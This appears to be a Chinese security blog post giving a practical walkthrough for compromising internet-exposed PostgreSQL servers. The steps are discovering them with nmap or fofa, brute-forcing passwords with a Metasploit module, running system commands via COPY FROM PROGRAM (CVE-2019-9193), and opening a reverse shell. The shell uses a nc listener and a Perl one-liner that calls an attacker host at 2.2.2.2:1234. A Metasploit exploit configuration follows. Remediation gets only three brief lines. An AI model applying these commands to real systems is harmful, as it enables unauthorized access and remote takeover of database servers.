点击"仙网攻城狮”关注我们哦~

不当想研发的渗透人不是好运维

让我们每天进步一点点

简介

PostgreSQL( 读作 Post-Gres-Q-L)是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS)。

当该服务配置不当开放到外网时可以被暴力破解密码,获得任意用户密码登录成功后使用(CVE-2019-9193)高权限命令执行漏洞即可反弹管理员shell

实战

1.使用nmap或者fofa发现该端口或者相关服务

2.使用kali系统中msf渗透模型进行暴力破解用户密码。

msfconsole   //进入msf工具
use auxiliary/scanner/postgres/postgres_login  //进入暴力破解模块
set rhosts 1.1.1.1 //添加目标ip
set rport 5432  //添加目标端口
set user_file /home/taibai/1  //后面的路径是用户名字典
set pass_file /home/taibai/2  //后面的路径是密码字典
show options  //查看相关配置信息
run  //开始运行

破解成功后会有提示破解的用户密码(用户密码字典在渗透工具集里面有收集好的可以直接用哈,微信公众号回复任意就可以获取资源列表)

3.使用破解后的用户名密码登录

psql -h 1.1.1.1 -U postgres -W    //连接后提示输入密码

4.使用(CVE-2019-9193)高权限命令执行漏洞执行命令

DROP TABLE IF EXISTS cmd_exec;  //删除你想用来保存命令输出但是可能存在的表
CREATE TABLE cmd_exec(cmd_output text);  //创建你用来保存命令输出的表
COPY cmd_exec FROM PROGRAM 'id';   //通过 “COPY FROM PROGRAM”执行系统命令
SELECT * FROM cmd_exec;   //查看执行结果

5.使用nc反弹shell(注意需要公网ip地址)

//攻击机上执行
nc -vv -l -p 1234//perl命令来反弹shell
COPY files FROM PROGRAM 'perl -MIO -e "$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"2.2.2.2:1234\");STDIN->fdopen($c,r);$~->fdopen($c,w);system $_ while <>;"';

6.如果上面不行可以直接使用msf中利用模块(注意需要公网ip地址)

set rhosts 1.1.1.1  //配置目标ip
set rport 5432   //配置目标端口
set username postgres  //配置目标用户名
set password 123456   //配置目标密码
set lhost 2.2.2.2   //配置反弹ip
set lport 1234   //配置反弹端口
show options  //查看配置
exp  //运行

7.修复建议

升级最新稳定版本

配置端口白名单不要开放到外网

配置强密码

往期内容

Redis未授权漏洞利用

灭世之Apache Log4j2 远程代码执行漏洞

CTF资源上新

更多资讯长按二维码 关注我们

专业的信息安全团队,给你最安全的保障。定期推送黑客知识和网络安全知识文章,让各位了解黑客的世界,学习黑客知识,普及安全知识,提高安全意识。

觉得不错点个“赞”呗      

PostgresSQL弱密码导致命令执行相关推荐

  1. 通达OA v11.3 以下版本 任意文件上传加文件包含导致命令执行漏洞在线实验环境

    转载自: [通达OA <= v11.3 任意文件上传+文件包含导致命令执行漏洞利用]- https://store.vsplate.com/cn/post/519/ 在线环境地址:https:/ ...

  2. linux实践-弱密码导致服务器被黑

    本人从事IT行业以6年有余,这期间曾尝试过很多方向,但基本都不做开发.最近又开始尝试做运维.接下来就说说做运维以来遇上的第一次事故. 那天下午接到研发的工作单,要求上架2个linux的服务器,只要安装 ...

  3. phpmyadmin 弱密码导致一句话木马上传

    1.打开phpmyadmin(一般防火墙不能打开) 弱密码登陆后修改变量(123.php是上传的木马文件名,上传多个木马时不要重名) 在SQL输入select "<?php @_POS ...

  4. 命令执行漏洞 java_白帽子挖洞—命令执行(Commnd Execution)篇

    0x00介绍 命令执行漏洞概念:当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数.如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的 ...

  5. jenkins java反序列化_Jenkins “Java 反序列化”过程远程命令执行漏洞

    ###漏洞原理 反序列化是指特定语言中将传递的对象序列化数据重新恢复为实例对象的过程,而在这个过程中会执行一系列的字节流解析和对象实例化操作用于恢复之前序列化时的对象.在原博文所提到的那些 Java ...

  6. 深信服行为感知命令执行漏洞

    深信服行为感知命令执行漏洞 1.深信服行为感知漏洞 1.1.漏洞描述 1.2.漏洞影响 1.3.漏洞复现 1.3.1.登录页面 1.3.2.构建漏洞URL 1.3.2.1.查询IP地址 1.3.2.2 ...

  7. 深信服 行为感知系统 c.php 远程命令执行漏洞

    漏洞描述: 深信服 行为感知系统 c.php 远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行 漏洞利用条件: / 漏洞影响范围: 行为感知系统 漏洞复现: 1.POC:/tool/log ...

  8. PHP--远程命令执行漏洞CVE-2018-19518复现

    目录 漏洞介绍 漏洞复现 进入容器 移除环境 漏洞介绍 -php imap扩展用户在php中执行邮件收发操作,其imap_open函数会调用rsh来连接远程shell,而debianh/Ubuntu中 ...

  9. Cacti命令执行漏洞分析 (CVE-2022-46169)

    一.漏洞背景 Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具. 在本漏洞中,攻击者可通过控制由get_nfilter_request_var()函数检索 ...

  10. bulldog-1靶机 write up 源码 MD5解密得到密码到后台 命令执行绕过 反弹shell string分析文件得到密码提权

    bulldog-1靶机 write up 0x00 环境搭建 0x01 信息收集 0x02 漏洞挖掘 web漏洞思路 ssh 利用思路 步骤一:浏览网页 爆破目录 步骤二: 破解hash 步骤三:利用 ...

最新文章

  1. 边缘检测、Hough变换、轮廓提取、种子填充、轮廓跟踪
  2. python推介系统方法_基于AutoRec 的推荐系统介绍与python实现
  3. php range第二个参数比第一个小,鲜为人知的 PHP range() 函数
  4. 各种模板(数学数论字符串)
  5. php 获取文件最后几行,php获取文件的最后N行数据
  6. Swift学习笔记 闭包表达式
  7. python之路——面向对象进阶
  8. 在Arcgis中利用Python编写脚本批量化处理数据实例
  9. 【设计模式】代理模式
  10. 计算机组成原理面试常见问题
  11. 软件测试——图书管理系统的测试计划书
  12. Chrome插件(UserScript)开发教程
  13. 2020年度十大高薪岗位出炉,程序员霸榜!
  14. 波长与颜色的对应关系之python实现
  15. KIBA 和 Davis 数据集下载 以及部分学习笔记
  16. 【问链-区块链基础知识系列】 第十二课 区块链产业落地现状分析
  17. 阿里云大数据平台的实操:ODPS的SQL语句
  18. 为什么刹车热了会失灵_急!我的刹车为什么突然不管用了?
  19. Google Map API 使用总结
  20. loadrunner11补丁

热门文章

  1. RPGViewer - 游戏常用压缩算法的介绍和识别
  2. 积累资源,胜于一切项目
  3. 电子商务B2C网店购物系统走势
  4. 联通BSS-ESS-CBSS系统安装相关
  5. linux centos无线网卡驱动安装,CentOS 无线网卡驱动安装
  6. Macbook Pro 201 装Win10 声卡_直播_个人工作室入门_1K-2k价位录音编曲声卡推荐
  7. 抛砖引玉——Stagefright漏洞初探
  8. 局域网联机游戏找不到服务器,国庆想局域网联机,除了“吃鸡”,这些Steam游戏别错过...
  9. word打印高清图片
  10. linux线程互踩,IOS 多线程漫漫谈(Process and Thread)